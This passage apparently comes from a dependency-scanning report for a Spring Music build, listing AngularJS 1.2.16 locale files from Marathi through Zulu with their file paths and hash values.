spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mr-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mr-in.jsMD5: 505bec8f2297564968c5b2f9cab8ed92SHA1: f0344f6dcd79f77f0a9861065a215d3b8ab275aaSHA256: 28f93ba77ad2435c21ee85794ed94d16403b2de890610c64e2ec165116158eaf
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mr.jsMD5: 44ca1499bc67f865017a6e9365ea4136SHA1: e16bbdf5ce9ed5f1b6d6dddd7526f57918101e41SHA256: 7a7932e904cc3a737f96d7148e78d35c264705aed831d89f6f05a253e59534b9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ms-my.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ms-my.jsMD5: 3582c60fc3de819f57b7eda865986a7eSHA1: c798a9684df9b44fcfa531c25d9929e506e2e0edSHA256: e39136f976f8ca5642252dad6557c38c4f1ff935b81c0ab5418b0fccca828425
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ms.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ms.jsMD5: af9d81279156d2220a710730eec50437SHA1: e0deea43fadb8c05e542fb7424e62d2b9b1a46bdSHA256: a54bae3d90d41e8631af85d78f765ec7442d7aa68bcf475ea3bb220ebcffc3a0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mt-mt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mt-mt.jsMD5: abe8b0a61ca17402f6f40cc2e9876d19SHA1: 2a005f882b307f7ed04e8476807509260df44d7cSHA256: db1433a70b9e808ce993d7a93d00c7c9998600bb38c023520fead7d30bc73b2e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mt.jsMD5: 3ba3b0d77f8c52456f4336d8181acc7aSHA1: 26f2524c109c761a0e5ca0d739218e84a74ad67dSHA256: 5f4575cbafd47bbbb9a24f7f889208b5bb0567ece659fa5041725027666bda49
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl-cw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl-cw.jsMD5: 2da6f85494dd8f2d916fd1acdff21a54SHA1: d59e658a156823c9b489b1065384e4d41b0ad7d3SHA256: 79f262ecfa62bf4259e2698b87f4333bacaf01e4244284dec3490271c6bacef5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl-nl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl-nl.jsMD5: 1ee9a880a7710b0a485fdf30abf80399SHA1: 5e2582ab145fe7b9a98dca551e2b50e1c7210ef4SHA256: 78d3ac2c84cecfec2a40a05faba39c9a2d8c93d1a4f3fb35ab2eeddaecd0db22
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl-sx.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl-sx.jsMD5: 14d9c88c730ad7d6037b2a8702e22b71SHA1: c44ad16db80791e599d3a56575f10696aa60fbbfSHA256: 7aaf607f4ce78dd1467bb3df1eb983b3c6aae93bde8a772c7457656d400bed22
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl.jsMD5: 020a83299231646f59a4e96cca91aa5dSHA1: 5b1eacfccb616e43abb5b8e24bdb6580ed00626aSHA256: 6be94740795992b4b51351c35c4a87756ec118755845febe22da197cef69d0e3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_no.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_no.jsMD5: 81e9af58edc17301ef6ddadc108217d1SHA1: 989f1bde5ef95cf0555356d40e65eebc4f5118caSHA256: 5285501230d1b3bdc0ebe490481c50340bd37f91a6624ffde0c9675876d93484
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_or-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_or-in.jsMD5: 2c2201d76fed460cb2754fe8126943a2SHA1: be27b8cd1224aabb5c864a80dfb41f31face03cdSHA256: f009bd4a1908fbdb14ac652f7c1b7ed3408a50609e678d78067f4d02d68a4033
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_or.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_or.jsMD5: e93a0a5a9292fb8c1132810b19712acdSHA1: c9b06afc54eae506f3636e1415bf8393a0f8be5cSHA256: ca7045a69d5e27c381fbb718d6084be9bed3bca336a4d9513b2b766b9587250c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pl-pl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pl-pl.jsMD5: bd2223760e50f22e25226c2a04e0e6fcSHA1: 81d338d6c832274b1bd6fde5f61e28f36a03f89aSHA256: b978d0c229c09dc68d3c7c572ca5f2e3a79ca8d624e939c5adc7e6348d0bc4b1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pl.jsMD5: e24f02bbe5cfd7251062726ffcbe8aeeSHA1: a246a4dbe4b0fe1f54084ae598348099c70bbad9SHA256: 985bfac724d8925fe37bf62f66a20a47e9ddb89ee56037dfd7d45bf54767840c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pt-br.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pt-br.jsMD5: 4753313faf1fc3202e324051d205de10SHA1: b5f4c69a3ebbc33d6f6fc353c2eab611ca109b74SHA256: 409a2c715bb5befbb917f93506044e55578432e500da08e1c45bddfc4ef9cbc2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pt-pt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pt-pt.jsMD5: d47d0a8221a5756f4b3600baa72f05a4SHA1: ecf393370e4ef34588a651899218e08b2c0254f2SHA256: a8720ed7ba58cc1dc0cd4747e41d7d60d45541ca3b1cb560d89851e2ff027d74
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pt.jsMD5: 47e7c7bf78d1ee432d83dac6a70e691dSHA1: 934a3b51d9c9f3b54bdb7527c5b8f5ff6da9f7d7SHA256: 280d2502045afc3773666f197c6645b35f6241670cec0194dfb071892b8e4070
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ro-ro.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ro-ro.jsMD5: c6c85dbfda5bd0318fd6552a4577247dSHA1: 738cc856ed1408b877a62d12e6c2e4fba7b2e7f8SHA256: ab3d2e5d40532b86120ec4528cab2ceb08547597597bf7d5c2f2c79f25edc036
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ro.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ro.jsMD5: 5b0d54f89aa006f27248fc139f247034SHA1: d7c66d8548b30f212b842fd8baf8cd5833c0a031SHA256: b86b61bfa9ebe5a5fa227e386c900d2f01704b97aa92b9e6a4a8afe5a92f21ff
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ru-ru.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ru-ru.jsMD5: 204fbd85407f81f3c6125e3fbe9e476fSHA1: ef2fb44e7a58044bbd00f60ad5a8ae4dbe6eff92SHA256: b534c2c9e883e963abb17323744122a648b9df032d6255621841b9ef3cf37bf3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ru.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ru.jsMD5: 58614a0195daaaebda6674feedbe16aaSHA1: d809ef52bd5c67fd50bd4a73c1d8355c9c7197d8SHA256: 7ef06d2a7a0a54848176e8c31bc5796cc0944b059cdadfd2641b4ce97a9c20de
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sk-sk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sk-sk.jsMD5: 5c81269f03a3476ac1fae2f88e68f242SHA1: 7546ec981a9108d72f649ba7d10073f079c7d2e7SHA256: e61ed105d38ac665ea5a687655ddc1643ef4e48bb13c355ffd70b8cbb1106e46
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sk.jsMD5: 0fa7e8027baa0ecbe9873a6ad1779ac7SHA1: f1f102d3cb4a594893fe9abf03b546b57115ea3fSHA256: 82cab0573b4624bc3795f5a54febc7ec2d539e46520ba0191d039c83236e0398
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sl-si.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sl-si.jsMD5: c31218517f8d8ce24c8f35e9a002bd42SHA1: 8774b78f713cf50a656f2ad06a3c86fc9e81ccb0SHA256: 94838f5a413930bfc535a7e87f467b0150b43978fd8b3861b615276ab11d1355
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sl.jsMD5: a98c80c5178ead4503996d80f2b7ce58SHA1: 3ef1d229264e43d65a11d415f24b58715e826f4bSHA256: c82b53125a4fb14963fd20473fad799d488b34b3ecc5608e1983cc4649d9626d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sq-al.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sq-al.jsMD5: fcfd6ed3ca4f3e79330fd6554fa62dffSHA1: 0a35ea7303c1fdd3566673f10b31d19e6dd57887SHA256: 44fc9c97df9dc9b1dbf7c9cf9b6e06a0154357fdf8a1785823281a1e53354c3b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sq.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sq.jsMD5: fe1bd08f4351c143197a11cf777ef047SHA1: 50473b23c9163a6d1bf1a5e9965a24e4826e886dSHA256: f7735b3c2e818235e7e3bacb136f2d4e255707c901b466ef97deb1c17d172c9c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sr-cyrl-rs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sr-cyrl-rs.jsMD5: ca27f02ad0dd5a3a377d6a282c2435aaSHA1: 3d2150947b28081d89ed2e81f64780cde82c18dbSHA256: ed3d5108db34bbd300576636c0c7308bb8ba4465dcf34abca60a37fa6ab7c3ba
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sr-latn-rs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sr-latn-rs.jsMD5: 6155027570c0aef2af921074e25d1b70SHA1: b3ab264c6e56172e0c78c38d29c7574910fffc8dSHA256: c8f9082c5f8dc930cd3203f4db2943c08497b9f88ab835e5b33ca38e23e0cba5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sr.jsMD5: 5b60a516cb6419b79578ac3079e0405aSHA1: 4dc6c1f4680e67e52785e60abfb87b9f13efc704SHA256: b26f38a6bb9ea651a26ef6def3cf9047d1773f79f68fdd2d58c3ab33df6031de
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sv-se.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sv-se.jsMD5: 90e0f706eef17bb039068768bffe4651SHA1: ea107446b3ebd4160b914e79db0e45ded220a0d8SHA256: c4e6ff46cb19a740c9725d086653d48d8c3adadebcb99d5598224aa89d0ff958
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sv.jsMD5: 09b88cc023bc9925a4463cfc4840425aSHA1: 65652b1914ac9fa5d1bfa5da665b03935cc90931SHA256: 424e7d8b85fd18a2f91362b4928ec5d6db005d6fd5927b909ebecf15518c8037
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sw-tz.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sw-tz.jsMD5: c1c1ed12491f2f1da1ad818ea04e96faSHA1: d9c7fb89d8a826d9a8a01eb51a4e4d8a7eb5b29cSHA256: d7a69eccb397f7c20d33d4baa38a809d799a15f48a7910a08c646f49d1315d28
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sw.jsMD5: 4765ade7f90d1bdb144eff9d32a4f9ecSHA1: d58de6410c7361850fa95220a4396b13e4b2f0caSHA256: ba97f8edb94a297ffa8029410e2242246889e97a94b1f185532559a391357704
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ta-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ta-in.jsMD5: 8a757a3191571e9fa12331d75be767d9SHA1: 1f50ecffd24b1be3bce033f34feae86db133cbffSHA256: 2502e202e8e973193e75b8a7d4867492dc7b4392380c8d81dc2982bbc8745f4c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ta.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ta.jsMD5: 47f7c724ce78055ac8de2d8a5a06f423SHA1: c722c68e069533a4b03da931fa51f523ac0284b6SHA256: c53e7bfaa7d172fbbd148000e17d5b5372af0c4098287421151540382975eabd
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_te-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_te-in.jsMD5: cf4b3de1982d082dc1e2cdc073a8f33aSHA1: 9312d4c2b20e5a61cea250d418d1d4f280fbbd14SHA256: 477cac38b6fe9ff970b3d70e22c36f958344c5df002df6ef3c074150d26324bf
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_te.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_te.jsMD5: a76a1c600fffab923aef7bbb4bb4009fSHA1: e56c7ec4a65140e9b8ae6036957ec8911d185c34SHA256: a2e6eff19362e978a4372b42c0ae5cc4d60245533f833644a4e8d3c6b4bd4d93
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_th-th.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_th-th.jsMD5: 2ecbf2bfa7e627b603d19fd312174c84SHA1: a11308f3067a386cd9a13809d128c68b30dd39c2SHA256: 802741a779cd0aff552ffa5fdf0a36421e9fabc4f91b24fe7299ad66104ed1f4
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_th.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_th.jsMD5: e272aab515b1b28805abd6ab1e4673acSHA1: 263188b552845ccd344d00ef0cd402285f6a5d23SHA256: 559664db3ca6601da42cd29075949b574a465576e61009b0d9919e07a5b5581c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_tl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_tl.jsMD5: 866913ac10a2f7c93f1441e96fe5daf3SHA1: 9bcd5aa2a9f69a9eab6e5452c3c23db7a49a1e42SHA256: 30eb2a411bac01758fd44e914bfda28ffbad9d1ab283040c23f0d8396bd7e9a7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_tr-tr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_tr-tr.jsMD5: b6ab57581c3fdc02072c17738afaee03SHA1: 1d41125a5e6db3a0bc45ff0065ed43aa8dada298SHA256: 497ce2ade6c1152e6aecc9d1db23befb68e57dea84da69be67dadf8be2932542
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_tr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_tr.jsMD5: 268c1518114b27fff577af3aa01324b8SHA1: 4ebaf1f347e5900e245754e4423d5b6690a9e7adSHA256: 13c25473a5a5afc86d5e5e48f7c851c257be3ac796c05b0079b2e470bc0697f6
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_uk-ua.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_uk-ua.jsMD5: 897d2f102b7fbf7285b7f4cbc0367042SHA1: 94bdecacdcfa2441331f1ecec855449ea5b33dc8SHA256: 375fd350009d22b24abfe5a1c914609d130830203311544e3fb50fa685e8bd4b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_uk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_uk.jsMD5: f9fe1870529eef262e418a28470470d6SHA1: 9f93d7b075b3322ad2c75ca277fcde561f27678cSHA256: 26da53e4f4b5390bc51d7791ac76d1d801189cc921b8bccb451407e1d6ba9901
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ur-pk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ur-pk.jsMD5: 8178ef57143cecdd09196b93e4272d5bSHA1: 812170caf187606cc18d0135b3304beef6f31c00SHA256: 8341e8fed9ac473597948c47d9d77e14a7307f8e8c8e773171d5ccde26d3e2c8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ur.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ur.jsMD5: dd5469ccf533f57126152f3511176d15SHA1: cc83abbb2c7a202453b796bea6b4027a7a4d1226SHA256: 97bdb50a2729f94a43a79afd2960ee67fca26cfe6ead6d5ce4d904f489348378
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_vi-vn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_vi-vn.jsMD5: 4ac65ba73233d5e04682a7567acc6dd4SHA1: d611a744a28baccdfd3ec09f77eb8df20fbab3b0SHA256: 541cd9370b96650cd864792c1befdf3b2c220904e3efd13a9528da83c9af95d3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_vi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_vi.jsMD5: 18b4f391e6f047d975355e4ab8ff8756SHA1: 78afbde12b2e3004e7e4895e82e20f5d03c5f08fSHA256: b3f86cde19cfb7ead821e700303a067852c3793e05203cf184274c4c6bed5d79
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-cn.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-cn.js
MD5: c4a7a552119cd0b6fa2913e96dc2e59b
SHA1: 4c875fd240e3db268dff40fbeff2a6fc5d57fd8f
SHA256: 5144e0838f94636a9b645fbd20dc543b082555dd2dfafdb2c0bd1fbe008c173b
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-hans-cn.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-hans-cn.js
MD5: aeccf8e7f5414894e70970388601a7cf
SHA1: ce83ee76bee45caeaf070d4734052b2502047ccb
SHA256: 00d1fd2c4cfc91d21813dd407fa66fabe1b96f1685e984679e13d295a278cd06
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-hk.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-hk.js
MD5: 0fdd2d0ddd3042f8f7f518a98f51585f
SHA1: 84f4b2ec7182ec6e2869167bf4eb2b08b00053de
SHA256: 68ff34f9c26aa6a131bc655c4ae36c89dc3b8d24f88569d5d4969b1641d0bb21
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-tw.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-tw.js
MD5: 2a5a502645668d5efe7e488957b9233a
SHA1: 07e0dcc027a064f29c13e35a09e2f92066d0a28d
SHA256: 045b19e4b4d7201c7ab4d9a9f19165bfdb1cc8824189ce849d14fcae0ba0d2b8
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh.js
MD5: b29c3a0407d161e042a23386ea7e405f
SHA1: 3fd2034f27f570f70d1fbdbade4f9467e80294d0
SHA256: cd827238c4d6ec4653826488f8711c7dfecaeea647fabb08397f996f5ef08637
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zu-za.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zu-za.js
MD5: 908af5dc86261d7a52e25ecbe64cc9b7
SHA1: 3ef47b228b2297f3a88cb356bf0a5a82e38a6132
SHA256: b2c07473495615bb399dc2f058b5edff2a27f36ae00e586168e7afa350fe35a0
Evidence: (none)

spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zu.js
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zu.js
